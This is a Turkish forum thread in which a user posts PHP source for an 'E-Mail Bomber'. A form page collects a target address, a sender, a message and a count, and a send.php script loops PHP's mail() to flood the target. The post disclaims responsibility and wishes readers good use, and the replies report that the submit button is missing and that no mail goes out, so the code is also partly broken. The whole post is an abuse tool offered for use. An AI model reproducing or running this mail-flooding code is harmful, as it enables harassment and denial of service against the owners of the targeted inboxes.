E-Mail Bomber Kodları [PHP]

ProwL

Gitarist
Katılım
19 Haz 2005
Mesajlar
3,092
Reaction score
0
Puanları
0
Konum
istanbul
bomber.php kodları;

PHP:
<title> E-Mail Bomber by ProwL </title> 
<?php 
//I am not responsible for what you do with this script 
// ProwL 
echo '<font color=red><b><h2>E-Mail Bomber by ProwL</h2></b></font>'; 
?> 
<form action="send.php" method="post"> 
<fieldset><legend>Fill in the following information:</legend> 
<p><b>Email to Bomb:</b> <input type="text" name="email" size="40" 
maxlength="80"/></p> 
<p><b>From:</b> <input type="text" name="from" size = "50" maxlength = "30"/></p> 
<p><b>Subject:</b> <input type="text" name="subject" size="50" maxlength="100"/></p> 
<p><b>Message:<b></p><p><TEXTAREA NAME="message" ROWS=6 COLS=40> 
</TEXTAREA></p> 
<p><b>Amount of E-mails to send: </b> <input type="text"  name="sendnum" size="30" maxlength="8"/></p> 
</fieldset> 
<div align="center" <input type="submit" name="submit" value="Bombz Away" /></div> 
</form> 
</body>

send.php kodları

PHP:
<?php 

$email = $_REQUEST['email']; 
$subject = $_REQUEST['subject']; 
$message = $_REQUEST['message']; 
$from = $_REQUEST['from']; 
$sendnum = $_REQUEST['sendnum']; 

$i = 0; 
while($i <= $sendnum) { 
mail($email, $subject, $message, "From: [email protected] <[email protected]>"); 
echo "<center><br>$i E-Mail Sent<br><br></center>"; 
$i++; 
} 

?>

Send.php dosyasındaki mail adresini kendinize göre değiştirin. İyi kullanımlar (;
 
Dostum emeğine sağlık fakat bomber.php kodlarında hata var gönder butonu çıkmıyor. Onu düzelttim ama yine de mail yollamıyor kontrol edersen sevinirim :)
 
bu kodları nasıl kullanacağız

gönder butonu nasıl olacak yok ya
 
Geri
Üst